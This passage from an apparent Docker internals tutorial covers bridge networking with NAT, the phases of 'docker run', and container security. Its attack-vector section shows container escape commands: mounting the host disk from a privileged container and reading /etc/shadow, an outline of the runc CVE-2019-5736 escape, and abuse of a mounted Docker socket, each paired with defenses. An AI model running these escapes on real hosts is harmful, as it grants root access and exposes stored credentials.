&lt;p&gt;The bridge has learned which container has IP &lt;code&gt;172.17.0.2&lt;/code&gt; (via ARP). It forwards the packet out the correct veth pair.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;⑤ Packet arrives at container's eth0&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Inside the container's network namespace, nginx sees:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Incoming connection from 203.0.113.5:54321 to 172.17.0.2:80
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Nginx processes the request and sends a response.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Response path (outbound traffic):&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;⑥ Response leaves container&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Source:      172.17.0.2:80 (container)
Destination: 203.0.113.5:54321 (original client)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;⑦ Packet crosses veth pair to bridge&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The container's default gateway is &lt;code&gt;172.17.0.1&lt;/code&gt; (the bridge). Packet goes back through the veth pair to the host.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;⑧ iptables SNAT rewrites source&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;The POSTROUTING rule fires:
-A POSTROUTING -s 172.17.0.0/16 ! -o docker0 -j MASQUERADE

This rule means: "For any packet from the 172.17.0.0/16 subnet (the docker0 bridge network)
that's NOT going out the docker0 interface (! -o docker0), apply MASQUERADE"

In our case, the packet from 172.17.0.2 matches this rule.

Packet becomes:
Source:      192.168.1.10:34567 (host's IP with a random high port chosen by kernel)
Destination: 203.0.113.5:54321 (unchanged)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;What is 172.17.0.0/16?&lt;/strong&gt; This is &lt;strong&gt;subnet notation&lt;/strong&gt; (CIDR) representing the entire IP range that docker0 manages:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;172.17.0.1&lt;/code&gt; — docker0 bridge (gateway)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;172.17.0.2&lt;/code&gt; — Our container&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;172.17.0.3-255.255&lt;/code&gt; — Other possible container IPs&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;172.17.0.0/16&lt;/code&gt; — The whole subnet (all of the above)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Why SNAT?&lt;/strong&gt; The external client sent the request to &lt;code&gt;192.168.1.10:8080&lt;/code&gt;. If the response came back from &lt;code&gt;172.17.0.2:80&lt;/code&gt; (a private IP it's never heard of), the client's firewall would drop it as unsolicited traffic. SNAT rewrites the source to the host's IP.&lt;/p&gt;

&lt;p&gt;The kernel maintains a &lt;strong&gt;connection tracking table&lt;/strong&gt; (conntrack) that remembers:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Inbound: Client's packet to &lt;code&gt;192.168.1.10:8080&lt;/code&gt; was DNATed to &lt;code&gt;172.17.0.2:80&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Outbound: Container's response from &lt;code&gt;172.17.0.2:80&lt;/code&gt; is SNATed to &lt;code&gt;192.168.1.10:34567&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When the response packet reaches the client, conntrack ensures the client sees it as coming from the same endpoint it originally contacted (&lt;code&gt;192.168.1.10:8080&lt;/code&gt;), making the whole exchange appear as a normal TCP connection.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;⑨ Response sent to client&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;From the client's perspective, it had a normal TCP conversation with &lt;code&gt;192.168.1.10:8080&lt;/code&gt;. It has no idea a container was involved.&lt;/p&gt;

&lt;h3&gt;
  
  
  9.4 Container-to-Container Communication
&lt;/h3&gt;

&lt;p&gt;When two containers on the same host talk to each other, it's much simpler — &lt;strong&gt;no NAT required&lt;/strong&gt;:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmlmi1t4uanszmef4jc5l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmlmi1t4uanszmef4jc5l.png" alt="container-container communication" width="800" height="149"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Container A sends a packet to &lt;code&gt;172.17.0.3&lt;/code&gt; (Container B's IP)&lt;/li&gt;
&lt;li&gt;The packet goes through A's veth pair to the &lt;code&gt;docker0&lt;/code&gt; bridge&lt;/li&gt;
&lt;li&gt;The bridge sees the destination MAC address (learned via ARP) and forwards directly to B's veth pair&lt;/li&gt;
&lt;li&gt;Packet arrives at Container B — &lt;strong&gt;no address translation needed&lt;/strong&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This is why containers on the same Docker network can talk to each other using their container names as hostnames — Docker runs an embedded DNS server that resolves container names to their bridge IPs.&lt;/p&gt;

&lt;h3&gt;
  
  
  9.5 Why This Design?
&lt;/h3&gt;

&lt;p&gt;This architecture gives Docker:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Isolation&lt;/strong&gt;: Each container has its own network stack. One container can't sniff traffic from another (different network namespaces).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Portability&lt;/strong&gt;: Containers always see themselves with the same internal IP (e.g., &lt;code&gt;172.17.0.2&lt;/code&gt;), regardless of what host IP they're running on.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Flexibility&lt;/strong&gt;: You can expose different host ports (8080, 8081, 8082) all pointing to the same container port (80), allowing multiple containers to run the same service.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Performance&lt;/strong&gt;: Container-to-container traffic never leaves the host — it's just a memory copy through the bridge. No network stack overhead.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;docker0&lt;/code&gt; bridge is created automatically when Docker starts. You can see it with &lt;code&gt;ip addr show docker0&lt;/code&gt; on the host. Every running container gets a veth pair, and &lt;code&gt;brctl show docker0&lt;/code&gt; will list all the attached interfaces.&lt;/p&gt;




&lt;h2&gt;
  
  
  10. The Full Lifecycle: Start to Finish
&lt;/h2&gt;

&lt;p&gt;Now let's put it all together. When you type &lt;code&gt;docker run -p 8080:80 nginx&lt;/code&gt;, what actually happens? The answer involves &lt;strong&gt;five distinct phases&lt;/strong&gt;, each handled by a different part of the stack.&lt;/p&gt;

&lt;h3&gt;
  
  
  10.1 The Five Phases
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsguktljvsbrzpenikw1a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsguktljvsbrzpenikw1a.png" alt="five phases" width="360" height="2043"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  10.2 Phase-by-Phase Breakdown
&lt;/h3&gt;

&lt;p&gt;Let's trace exactly what each component does.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Phase 1: Image Resolution&lt;/strong&gt; (dockerd → Registry)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;You:     docker run -p 8080:80 nginx
CLI:     Sends REST API call to dockerd
dockerd: "Do I have nginx:latest locally?"
         → Check local image cache
         → Missing! Need to pull from registry

dockerd → Registry:  GET /v2/library/nginx/manifests/latest
Registry → dockerd:  Here's the OCI manifest with 6 layer digests

dockerd: "Which layers do I already have?"
         → Check: sha256:abc123... ✅ (have it - ubuntu base)
         → Check: sha256:def456... ❌ (missing)
         → Check: sha256:789abc... ❌ (missing)

dockerd → Registry:  GET /v2/library/nginx/blobs/sha256:def456...
Registry → dockerd:  [compressed layer tarball]

dockerd: Unpacks layers to /var/lib/docker/overlay2/
         → Verifies SHA-256 checksums
         → Decompresses tarballs
         → Stores in content-addressable storage
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Phase 2: Container Setup&lt;/strong&gt; (dockerd → containerd)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;dockerd → containerd: "Create a container from nginx:latest"
                      Here's the config: { Image: "nginx", Ports: {"80/tcp": {}} }

containerd: Generates OCI runtime specification (config.json):
            {
              "root": { "path": "/path/to/overlay2/merged" },
              "process": { "args": ["nginx", "-g", "daemon off;"] },
              "linux": {
                "namespaces": [
                  { "type": "pid" }, { "type": "network" }, ...
                ],
                "resources": { "memory": { "limit": -1 } }
              }
            }

containerd: Prepares overlay2 mount:
            - lowerdir: nginx image layers (read-only)
            - upperdir: /var/lib/docker/overlay2/abc123/diff (writable)
            - workdir:  /var/lib/docker/overlay2/abc123/work
            - merged:   /var/lib/docker/overlay2/abc123/merged (what container sees)

containerd → runc: "Create container with this config.json"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Phase 3: Kernel-Level Isolation&lt;/strong&gt; (runc → Linux Kernel)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;runc: Reads config.json
      → Time to talk to the kernel

runc → kernel: clone(CLONE_NEWPID | CLONE_NEWNET | CLONE_NEWNS | 
                     CLONE_NEWUTS | CLONE_NEWIPC | CLONE_NEWUSER |
                     CLONE_NEWCGROUP)
               "Create a new process with 7 isolated namespaces"

kernel: Creates namespace structures
        → New PID namespace: container's processes start at PID 1
        → New NET namespace: empty network stack
        → New MNT namespace: isolated filesystem view
        → (and 4 others...)

runc → kernel: Write cgroup limits to /sys/fs/cgroup/
               - cpu.max = 100000 (no limit)
               - memory.max = 536870912 (512 MiB)
               - pids.max = unlimited

runc → kernel: mount("overlay", "/var/lib/docker/overlay2/abc123/merged", ...)
               "Mount the overlay filesystem as the container's root"

runc → kernel: mount("proc", "/proc", "proc")
               mount("sysfs", "/sys", "sysfs")
               "Mount pseudo-filesystems inside container"

runc → kernel: prctl(PR_CAPBSET_DROP, CAP_SYS_ADMIN)
               "Drop dangerous capabilities - container can't break out"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Phase 4: Networking&lt;/strong&gt; (dockerd → Linux Kernel)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;dockerd: "Container created, now set up networking"

dockerd → kernel: ip link add veth0 type veth peer name veth1a2b3c
                  "Create a virtual ethernet cable (veth pair)"

dockerd → kernel: ip link set veth1a2b3c master docker0
                  "Plug host-end into the docker0 bridge"

dockerd → kernel: ip link set veth0 netns &amp;lt;container-pid&amp;gt;
                  "Move container-end into container's network namespace"

dockerd → kernel: (inside container namespace)
                  ip addr add 172.17.0.2/16 dev veth0
                  ip link set veth0 up
                  ip route add default via 172.17.0.1
                  "Configure container's network: IP, gateway, routes"

dockerd → kernel: iptables -t nat -A PREROUTING -p tcp --dport 8080 \
                           -j DNAT --to-destination 172.17.0.2:80
                  "Add port forwarding rule: 8080 → container:80"

dockerd → kernel: iptables -t nat -A POSTROUTING -s 172.17.0.0/16 \
                           ! -o docker0 -j MASQUERADE
                  "Add SNAT rule for outbound traffic"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Phase 5: Process Launch&lt;/strong&gt; (runc → Container)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;runc: Everything is ready - namespaces, cgroups, filesystem, network
      → Time to start the actual application

runc → kernel: execve("/usr/sbin/nginx", ["nginx", "-g", "daemon off;"])
               "Replace this process with nginx"

kernel: Inside the container:
        → PID 1 is now nginx (not init!)
        → Sees only its own process tree
        → Sees only its own network interfaces (eth0 = 172.17.0.2)
        → Sees only its own filesystem (overlayfs merged view)

nginx: Starts listening on 0.0.0.0:80 (inside the container)

nginx → kernel: bind(sockfd, { 0.0.0.0:80 })
kernel: "Bound to port 80 in this network namespace"

runc → containerd: "Container is running, PID 1 active"
containerd → dockerd: "Container abc123 status: running"
dockerd → CLI: { "Id": "abc123...", "Status": "running" }
CLI → You: abc123def456...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  10.3 The Complete Timeline
&lt;/h3&gt;

&lt;p&gt;Here's how fast it all happens:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Time&lt;/th&gt;
&lt;th&gt;What's Happening&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;0ms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;You press Enter on &lt;code&gt;docker run&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;5ms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;CLI sends REST call to dockerd&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;10-200ms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Phase 1: Image pull (if needed) - can be ~0ms if cached&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;210ms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Phase 2: containerd generates config&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;220ms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Phase 3: runc creates namespaces &amp;amp; cgroups&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;240ms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Phase 4: Network setup (veth, bridge, iptables)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;250ms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Phase 5: execve("nginx") - PID 1 starts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;270ms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;nginx binds to port 80&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;300ms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;nginx is serving traffic&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;~500ms&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;Total time&lt;/strong&gt; (cold start with image pull)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;If the image is already cached, the cold-start time drops to &lt;strong&gt;~100ms&lt;/strong&gt; — just the namespace creation and process launch.&lt;/p&gt;

&lt;p&gt;Compare this to a VM:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Boot time: 20-60 seconds&lt;/li&gt;
&lt;li&gt;Memory overhead: 512MB minimum for guest OS&lt;/li&gt;
&lt;li&gt;Disk overhead: Full OS image (1-10GB)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Docker's speed comes from &lt;strong&gt;not booting an OS&lt;/strong&gt;. It's just process isolation with namespace boundaries — the kernel is already running.&lt;/p&gt;




&lt;h2&gt;
  
  
  11. Security Surface and Attack Vectors
&lt;/h2&gt;

&lt;p&gt;Understanding internals means understanding where things can go wrong. The container boundary is enforced by &lt;strong&gt;kernel features&lt;/strong&gt;, not by a hypervisor. This is both Docker's strength (speed, efficiency) and its weakness (shared kernel = shared attack surface).&lt;/p&gt;

&lt;p&gt;Every security discussion about containers comes down to one fundamental question: &lt;strong&gt;What happens if a malicious process inside a container tries to break out?&lt;/strong&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  11.1 The Threat Landscape
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff0654w2v5lcpqcbxyx74.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff0654w2v5lcpqcbxyx74.png" alt="threat landscape" width="458" height="2046"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The security model is &lt;strong&gt;defense in depth&lt;/strong&gt; — multiple layers that must all be bypassed for a successful container escape.&lt;/p&gt;

&lt;h3&gt;
  
  
  11.2 Attack Vector 1: Privileged Mode (&lt;code&gt;--privileged&lt;/code&gt;)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What it is:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker run &lt;span class="nt"&gt;--privileged&lt;/span&gt; malicious-image
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;What it does:&lt;/strong&gt; Disables &lt;em&gt;every single security boundary&lt;/em&gt; we've discussed:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;✅ Namespaces still exist, but capabilities are not dropped&lt;/li&gt;
&lt;li&gt;✅ cgroups still limit resources, but not access&lt;/li&gt;
&lt;li&gt;❌ All capabilities granted (CAP_SYS_ADMIN, CAP_NET_ADMIN, etc.)&lt;/li&gt;
&lt;li&gt;❌ &lt;code&gt;/dev&lt;/code&gt; is fully exposed (block devices, hardware)&lt;/li&gt;
&lt;li&gt;❌ seccomp disabled&lt;/li&gt;
&lt;li&gt;❌ AppArmor/SELinux disabled&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The attack:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Inside a privileged container&lt;/span&gt;
&lt;span class="nb"&gt;mkdir&lt;/span&gt; /mnt/host
mount /dev/sda1 /mnt/host  &lt;span class="c"&gt;# Mount the host's root filesystem&lt;/span&gt;
&lt;span class="nb"&gt;chroot&lt;/span&gt; /mnt/host           &lt;span class="c"&gt;# Change root to host filesystem&lt;/span&gt;
&lt;span class="c"&gt;# You're now effectively root on the host&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; /etc/shadow            &lt;span class="c"&gt;# Read host passwords&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Why it works:&lt;/strong&gt; With &lt;code&gt;CAP_SYS_ADMIN&lt;/code&gt; and full &lt;code&gt;/dev&lt;/code&gt; access, the attacker can mount the host's block devices and access the entire filesystem. The namespace boundary becomes meaningless.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Defense:&lt;/strong&gt; &lt;strong&gt;Never use &lt;code&gt;--privileged&lt;/code&gt; in production.&lt;/strong&gt; If you need specific capabilities (e.g., &lt;code&gt;CAP_NET_ADMIN&lt;/code&gt; for network tools), grant them individually:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker run &lt;span class="nt"&gt;--cap-add&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;NET_ADMIN &lt;span class="nt"&gt;--cap-drop&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;ALL my-image
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  11.3 Attack Vector 2: Kernel Vulnerabilities (Shared Kernel)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;The fundamental problem:&lt;/strong&gt; All containers share the host's kernel. A kernel exploit in one container = full host compromise.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Real-world example: CVE-2019-5736 (runc escape)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;This was a critical vulnerability in &lt;code&gt;runc&lt;/code&gt; itself. Here's how it worked:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Attacker prepares a malicious container entrypoint&lt;/span&gt;
&lt;span class="c"&gt;# The entrypoint overwrites /proc/self/exe (which points to runc on the host)&lt;/span&gt;

&lt;span class="c"&gt;# When the container starts:&lt;/span&gt;
&lt;span class="c"&gt;# 1. dockerd calls runc to launch the container&lt;/span&gt;
&lt;span class="c"&gt;# 2. runc forks and execs the container's entrypoint&lt;/span&gt;
&lt;span class="c"&gt;# 3. The malicious entrypoint overwrites /proc/self/exe&lt;/span&gt;
&lt;span class="c"&gt;# 4. Because /proc/self/exe is a symlink to the runc binary on the host...&lt;/span&gt;
&lt;span class="c"&gt;# 5. The attacker has now overwritten the host's runc binary&lt;/span&gt;
&lt;span class="c"&gt;# 6. Next time anyone runs 'docker exec', the malicious runc executes on the host&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Why it works:&lt;/strong&gt; &lt;code&gt;/proc/self/exe&lt;/code&gt; is a special symlink that points to the currently executing binary. For &lt;code&gt;runc&lt;/code&gt;, this points to the host's &lt;code&gt;/usr/bin/runc&lt;/code&gt;. Because the attacker had write access to this symlink from inside the container, they could overwrite the host binary.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Defense mechanisms:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. seccomp profiles&lt;/strong&gt; — Whitelist only the syscalls the container actually needs:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"defaultAction"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"SCMP_ACT_ERRNO"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"syscalls"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"names"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"read"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"write"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"open"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"close"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"stat"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"action"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"SCMP_ACT_ALLOW"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"names"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"mount"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"ptrace"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"reboot"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"action"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"SCMP_ACT_ERRNO"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Docker's default seccomp profile blocks ~44 dangerous syscalls including:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;mount&lt;/code&gt; / &lt;code&gt;umount&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;reboot&lt;/code&gt; / &lt;code&gt;sethostname&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;ptrace&lt;/code&gt; (process tracing)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;keyctl&lt;/code&gt; (kernel key management)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;2. Keep kernel &amp;amp; runtime updated:&lt;/strong&gt; CVE-2019-5736 was patched in runc 1.0-rc7. The fix was simple: mark &lt;code&gt;/proc/self/exe&lt;/code&gt; as read-only.&lt;/p&gt;

&lt;h3&gt;
  
  
  11.4 Attack Vector 3: Mounted Docker Socket
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What it is:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker run &lt;span class="nt"&gt;-v&lt;/span&gt; /var/run/docker.sock:/var/run/docker.sock attacker-image
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;What it does:&lt;/strong&gt; Gives the container &lt;strong&gt;full control over the Docker daemon&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The attack:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Inside the container with the socket mounted&lt;/span&gt;
apk add docker-cli  &lt;span class="c"&gt;# Install Docker CLI inside container&lt;/span&gt;

&lt;span class="c"&gt;# Now the attacker can create their own privileged container&lt;/span&gt;
docker run &lt;span class="nt"&gt;-v&lt;/span&gt; /:/host &lt;span class="nt"&gt;--privileged&lt;/span&gt; &lt;span class="nt"&gt;-it&lt;/span&gt; alpine sh

&lt;span class="c"&gt;# This new container has:&lt;/span&gt;
&lt;span class="c"&gt;# - Full access to host filesystem (mounted at /host)&lt;/span&gt;
&lt;span class="c"&gt;# - --privileged mode (all capabilities)&lt;/span&gt;
&lt;span class="c"&gt;# - Running as root on the host&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Why it works:&lt;/strong&gt; The Docker socket is the control plane. Anyone who can write to &lt;code&gt;/var/run/docker.sock&lt;/code&gt; can instruct the daemon to create containers with arbitrary configurations — including privileged containers, bind mounts of the host filesystem, and more.&lt;/p&gt;

